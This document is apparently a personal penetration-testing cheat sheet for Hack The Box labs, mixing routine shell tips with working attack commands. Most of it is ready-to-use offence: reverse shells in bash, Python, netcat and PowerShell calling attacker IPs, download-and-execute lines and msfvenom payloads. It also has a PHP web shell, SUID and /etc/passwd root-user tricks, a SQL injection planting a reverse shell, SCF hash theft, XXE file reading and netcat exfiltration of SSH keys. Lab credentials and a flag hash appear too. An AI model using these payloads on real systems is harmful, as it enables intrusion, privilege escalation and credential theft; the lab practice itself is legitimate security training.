USEFUL COMMANDS
BOX=ip
sudo nmap -sC -sV -oN AA.nmap AA.htb -v; sudo nmap -sS -sV -sC -T5 -p- -oN AA.full.nmap AA.htb -v
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -k -u 
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://knife.htb/ -H 'Host: FUZZ.schooled.htb' -fs 5815
sudo !!
stty raw -echo
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
gobuster dns -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -d schooled.htb
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
OR in grep: grep 'false\|nologin'
to count lines: wc -l <filename>
GREP 4 lines before match:
grep -B4 'blabla'
GREP after
hashcat --example-hashes|grep -A4 NTLM

LIST PROCESSES
ps -aux
sudo ss -antlp | grep apache
systemctl list-unit-files

SED/AWK
echo "I need to try hard" | sed 's/hard/harder/'
echo "hello::there::friend" | awk -F "::" '{print $1, $3}'
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn

MKDIR recursive
mkdir -p test/{recon,exploit,report}

TUNNELING AND PORT REDIRECTS
https://book.hacktricks.xyz/tunneling-and-port-forwarding

Workspace alttab = CTRL+ALT+arrow // move window to a workspace: CTRL+ALT+SHIFT+arrow

LINUX LIST USERS
cat /etc/passwd |grep -v 'nologin\|false'|cut -d ':' -f 1

LINUX LOGS
aureport --tty

PYTHON2 TO PYTHON3 CONVERT
2to3-2.7 -w 46635.py

CTRL + Z
stty raw -echo
fg

SHARED FOLDER
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other

SCREEN HI-JACK ROOT SUID SESSION
screen -x root/root
The said screen was ran with: "/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done"

STUCK??
nmap tcp? udp? -sS -Pn -p-? https on 80? http has php? CTRL+U? gobuster/dirbuster? subdoms/vhosts? hidden files? stego?
versions? updatedb searchsploit? google dorks xploits? ~? dns axfr @ip ?

PYTHON ESCAPE SCRIPT
import os; os.execl("/bin/sh", "sh", "-p")

PYTHON 
````
import random
import os
import time

L = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

while True:
    os.system("echo 'admin' > /dev/ttyUSB0")
    #time.sleep(5)
    r = ""
    for i in range(20):
        r += random.choice(L)
    os.system(f'echo {r} > /dev/ttyUSB0')
    #time.sleep(5)
    
````

DNS
dig axfr @10.129.146.152 friendzone.red

LINPEAS
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
IF NO WGET OR CURL: 
Victim machine: nc -lvn 9898 > linpeas.sh 
Attacking machine: cat linpeas.sh|nc monitors.htb 9898
See output and write to a file at the same time:
chmod +x linpeas.sh; ./linpeas.sh | tee output.txt

WINPEAS
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe
./winPEASx64.exe | tee -filepath output.txt

BASH LOOP LOOP
#!/bin/bash
for d in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
do
	for m in 01 02 03 04 05 06 07 08 09 10 11 12
	do wget http://10.129.245.165/documents/2020-$m-$d-upload.pdf
	done
done

REV SHELLS
bash -i >& /dev/tcp/10.10.14.98/5555 0>&1
0<&196;exec 196<>/dev/tcp/10.10.14.98/5555; sh <&196 >&196 2>&196
rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.98 5555 > /tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.73",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
open("/etc/passwd","a+").write("toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash")

BRUTEFORCE
hydra nineveh.htb -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
/opt/useful/SecLists/Usernames/top-usernames-shortlist.txt
hashcat --example-hashes|grep -n3 md5
hashcat -m 18200 -w 1 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

BINWALK
cd /tmp && git clone https://github.com/ReFirmLabs/binwalk && cd - && cd /tmp/binwalk && sudo ./setup.py install && cd -

RBASH ESCAPE
ssh <username>@<IP-Adress> -t "bash --noprofile"

WINPEAS /PSPY / WINDOWS /SUID SEARCH / EVILWINRM
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
find / -type f -perm -4000 2>/dev/null
wget http://blog.stackexchange.com/ -OutFile out.html
//WORKED: certutil -urlcache -split -f http://10.10.14.85:7878/shell64.exe C:\\users\\public\\shell64.exe
cmd /c powershell -c (New-Object System.Net.WebClient).DownloadString('http://10.10.14.85:7878/revshell.ps1') | powershell -noprofile -;
powershell -Command "Start-Process cmd -Verb RunAs -ArgumentList '/c cd /d %CD% && %*'"
powershell '(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.98:7878/priv.ps1","priv.ps1")'
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.98',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.58:8080/shell.exe','shell.exe')"
powershell Invoke-WebRequest -Uri http://10.10.14.58/shell.exe -OutFile out.yml
(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")
Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip"
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell 
sudo gem install evil-winrm
//F for full access on a file:
icacls C:\Users\Administrator\Desktop\root.txt /grant Alfred:(F)

WINDOWS CMD
Recursive search: where /r c:\ user.txt

WINDOWS EVIL-WINRM
git clone https://github.com/Hackplayers/evil-winrm
cd evil-winrm/
cat Gemfile
sudo gem install winrm winrm-fs stringio
ruby evil-winrm.rb -i heist.htb -u Chase -p 'Q4)sJu\Y8qz*A3?d'

KERBEROAST
impacket-secretsdump egotistical-bank.local/svc_loanmgr@10.129.152.219

METASPLOIT HANDLER/PRIVESC
ssh into suggester: scanner/ssh/ssh_login 
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.58 LPORT=6666 -f aspx -o revshell.aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.58 LPORT=6666 -f exe > shell64.exe
msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.10.14.98 LPORT=4444 -f elf > rev.elf
use exploit/multi/handler
UPGRADE: CTRL+Z, sessions -u 1
set payload windows/meterpreter/reverse_tcp
use post/multi/recon/local_exploit_suggester
run -j
background
sessions -i 1
ps
migrate 1828

JSON SSTI POST request (replace email by the right param)
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}"}

WRITABLE /etc/passwd
echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> /etc/passwd 
Credentials "toor1/foo"

COPY A FILE
cat file.txt|xclip

SSH
ssh-keygen -f mykey
password
python -m http.server 7878

cd && mkdir .ssh && cd .ssh && wget http://10.10.14.42:7878/mykey.pub && mv mykey.pub authorized_keys

ssh -i mykey developer@horizontall.htb
password

SSH port binding
ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -p 2222 -L 5555:localhost:5555 kristi@explore.htb

rev shell php worked with ext .htb (see html comment), user flag readable as www-data:
848b16799025a2a389f0ebe25d531be6

SQL INJECTIONS
admin' or '1' = '1
Copy to file login request from Burp name it "req"
sqlmap -r req --risk=3 --level=3 --batch --force-ssl

PERL SUID oneliner
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "id";'

PERL SUID script
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";

SMB
smbclient -N -L \\\\10.10.10.27\\
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP>
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
smbmap -R FolderName -H 10.10.10.100 -A Filename.xml -q
smbclient -L \\active.htb -U SVC_TGS
smbclient -N //10.129.146.152/general
recurse ON
mget *
smbclient \\\\cascade\\Audit$ -U s.smith -c 'prompt OFF;recurse ON;mget *'
C:\WIndows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
sudo apt install samdump2
samdump2 -o out_file SYSTEM SAM
msfconsole use winrm
impacket-lookupids
procdump https://download.sysinternals.com/files/Procdump.zip

SMB HASH STEAL
1)Create file named hash.scf:
[Shell]
Command=2
IconFile=\\10.10.14.108\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
2)Start responder
sudo responder -I tun0
3)Upload file and get hash when a user logs on
KERBEROASTING
python /usr/share/doc/python3-impacket/examples/GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.129.145.201 -request
python /usr/share/doc/python3-impacket/examples/wmiexec.py active.htb/administrator:Ticketmaster1968@10.129.145.201

BACKUP
scp -r htb-lawinn@htb-uccb72lwbw.htb-cloud.com:/home/htb-lawinn/my_data G:\Pentest\HTB\my_data

STEGO
steghide extract -sf out.jpg

SQL injection (SQLi)
Rev shell
GET /cacti/color.php?action=export&header=false&filter=1') UNION SELECT 1,username,password,4,5,6,7 from user_auth;update settings set value='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.85 5555 >/tmp/f;' where name='path_php_binary';-- - HTTP/1.1
-> URL encode it

MYSQL/SQL local
mysql -u ona_sys -p
show databases;
use SuperDB;
show tables;

When doing sql queries, if you add \G to the end, it will show the fields in a vertical list which makes tables with a lot of fields sooo much easier to read.  e.g., SELECT * FROM users\G;

TOMCAT
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=6666 -f war -o rev.war

UNZIP
gzip -kd archive.gz
tar -xvf archive.tar

EXFILTRATE
nc <YOUR IP> <PORT> < id_rsa
nc -nlvp <PORT> > id_rsa

XXE
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>  
           <bugreport>  
           <title>&xxe;</title>
           
SUID (THROUGH ROOT CMD EXEC)
chmod +s /bin/bash
bash -p
#

PATH INJECTION VULN
export PATH=$(pwd):$PATH
and put your own crafted binary when it is called directly in a script as root
